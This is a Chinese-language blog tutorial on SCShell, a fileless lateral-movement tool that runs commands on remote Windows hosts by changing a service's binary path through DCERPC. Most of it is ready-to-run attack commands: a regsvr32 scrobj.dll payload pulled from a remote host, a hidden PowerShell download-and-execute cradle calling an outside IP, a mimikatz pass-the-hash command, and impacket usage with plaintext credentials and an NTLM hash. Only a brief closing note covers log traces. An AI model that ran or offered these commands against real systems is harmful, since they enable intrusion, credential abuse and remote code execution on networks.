AI智能
改变未来
当前位置:爱站程序员基地 > 全栈知识 > Shell > 正文

横向无文件移动–SCshell使用

2021-06-09 分类:Shell 评论(0)

1、简介

SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道目标上的服务名称)。支持py和exe两种文件类型。

2、使用

Windows 使用

SCShell.exe target service payload domain username passwordSCShell.exe 192.168.197.131 XblAuthManager \"C:\\windows\\system32\\cmd.exe /c C:\\windows\\system32\\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll\" . administrastor Password # XblAuthManager 是 Xbox Accessory Management Service的服务名

测试写入文件

scshell.exe 192.168.152.148 defragsvc \"C:\\windows\\system32\\cmd.exe /c echo \' hello\' > c:\\windows\\temp\\hello.txt\" . administrator admin@123


CSshell横向利用powershell上线

scshell.exe 192.168.152.148 defragsvc \"C:\\windows\\system32\\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(\'http://182.1.1.156:8000/a\')\" . administrator admin@123

可以使用该C程序传递哈希值。
有时情况下,将使用当前进程令牌。您可以使用标准传递哈希方法设置当前流程令牌。

在本地系统上

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

然后在新创建的cmd.exe中运行SCShell.exe进行横向。
上面我们使用的是XblAuthManager,其实我们还可以使用defragsvc,msbuild等等

2. Linux 安装使用

pip install impacketgit clone https://github.com/Mr-Un1k0d3r/SCShellcd https://github.com/Mr-Un1k0d3r/SCShellpython scshell.py ./administrator:cxzcxz@192.168.52.133 # 执行cmd模式,没有命令回显python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash验证

3、日志痕迹

使用用户凭证连接会在目标日志系统留下用户名、来访机器IP和服务超时等信息

赞(0) 打赏
未经允许不得转载:爱站程序员基地 » 横向无文件移动–SCshell使用
标签:

相关推荐

热门文章

热门标签

源码 (2093)Java开发 (1438)Python开发 (1301)vps商家 (1289)夸克网盘 (1283)阿里云盘 (1267)Linux (1189)JavaScript (1119)PHP开发 (1058)计算机网络 (1055)MySQL (1015)Go语言 (985)UI/UE (975)CSS (970)人工智能 (933)Shell (930)安卓 (891)Android开发 (873)C# (861)ASP (815)网站架构 (798)IOS开发 (782)JQuery (759)Oracle (684)网络资源 (575)实用工具 (267)微信 (250)C语言/C++ (245)百度网盘 (208)github (132)